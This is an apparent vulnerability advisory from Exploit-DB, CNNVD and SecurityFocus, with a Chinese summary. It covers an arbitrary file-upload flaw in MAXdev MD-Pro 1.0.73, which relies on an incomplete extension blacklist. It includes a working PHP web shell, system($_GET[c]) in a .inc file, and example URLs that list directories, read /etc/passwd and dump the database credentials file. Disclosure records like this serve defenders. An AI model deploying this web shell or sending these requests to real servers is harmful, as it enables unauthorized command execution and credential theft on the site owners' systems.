https://www.exploit-db.com/exploits/26225
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-126

MAXdevMD-Pro是一个CMS系统，可以显示和管理一个网站内容的应用程序。MD-Pro让网站的管理简单而强大。MAXdevMD-Pro1.0.73以及可能之前较早的版本中的Downloads页面，使用不完整的黑名单去检查存在危险的文件扩展名，从而远程攻击者可以通过上传具有不同扩展名的文件来绕过文件扩展名检查并执行任意的命令，例如使用.inc文件。

source: http://www.securityfocus.com/bid/14750/info

MAXdev MD-Pro is prone to an arbitrary remote file upload vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

This issue is due to a design error in the application that uses a blacklist technique, saying what file extensions can not be uploaded, versus a whitelist design that would only permit certain file extensions. An attacker can exploit this vulnerability to upload arbitrary files including malicious scripts and possibly execute the script on the affected server.

This can ultimately facilitate unauthorized access in the context of the Web server. 

upload a file with .inc extension with this code inside:

<?php
error_reporting(0);
system($_GET[c]);
?>

now list directories with:
http://www.example.com/upload/dl/[filename].inc?c=ls%20-la

see /etc/passwd file:
http://www.example.com/upload/dl/[filename].inc?c=cat%20/etc/passwd

see database username and password:
http://www.example.com/upload/dl/[filename].inc?c=cat%20.././config/md-config.php

来源:XF
名称:mdpro-extension-file-upload(22199)
链接:http://xforce.iss.net/xforce/xfdb/22199
来源:BID
名称:14750
链接:http://www.securityfocus.com/bid/14750
来源:SECUNIA
名称:16731
链接:http://secunia.com/advisories/16731/
来源:BUGTRAQ
名称:20050906MAXdevMD-Pro1.0.73(possiblypriorversions)remotecodeexecution/crosssitescripting/pathdisclosure
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112603835317458&w;=2